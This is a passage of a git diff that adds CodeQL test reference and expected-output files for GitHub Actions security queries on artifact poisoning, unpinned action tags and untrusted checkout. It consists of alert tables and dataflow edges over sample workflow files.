"PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | +subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref new file mode 100644 index 000000000000..39548f274127 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningMedium.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected new file mode 100644 index 000000000000..10c1cd1ded6d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected @@ -0,0 +1 @@ +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | Potential artifact poisoning | diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref new file mode 100644 index 000000000000..7082dbada272 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningPathTraversal.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected new file mode 100644 index 000000000000..848962e26bd6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -0,0 +1,34 @@ +| .github/workflows/actor_trusted_checkout.yml:19:13:19:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:13:23:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:10:15:10:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning101.yml:11:15:11:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:94:15:94:39 | codecov/codecov-action@v3 | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:111:15:111:48 | peter-evans/create-pull-request@v5 | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:127:15:127:56 | thollander/actions-comment-pull-request@v2 | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit2.yml:34:15:34:42 | some-action/some-repo@latest | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'some-action/some-repo' with ref 'latest', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:21:13:21:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:25:13:25:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:25:7:28:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:31:15:31:34 | ruby/setup-ruby@v1 | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:109:15:109:42 | actionsdesk/lfs-warning@v3.2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:144:15:144:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:148:15:148:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:347:15:347:36 | docker/login-action@v2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:356:15:356:44 | softprops/action-gh-release@v1 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:449:15:449:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | +| .github/workflows/test17.yml:20:21:20:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Uses Step | +| .github/workflows/test18.yml:37:21:37:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:13:10:22 | foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref new file mode 100644 index 000000000000..8c9db66bf6bb --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref @@ -0,0 +1 @@ +Security/CWE-829/UnpinnedActionsTag.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected new file mode 100644 index 000000000000..365e9c823fac --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -0,0 +1,363 @@ +edges +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/resolve-args.yml:22:9:36:13 | Run Step: resolve-step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | +| .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:22:40 | Run Step | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning81.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:16:9:19:59 | Run Step: pr_number | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | .github/workflows/dependabot1.yml:43:9:45:29 | Uses Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | +| .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:48:9:52:57 | Run Step | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | +| .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | +| .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit2.yml:26:9:27:6 | name: C ... ildcard | +| .github/workflows/issue_comment_octokit2.yml:26:9:27:6 | name: C ... ildcard | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:37:9:38:37 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | +| .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:15:7:16:4 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout1.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:16:7:17:4 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:16:7:17:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:25:7:28:21 | Uses Step | +| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | 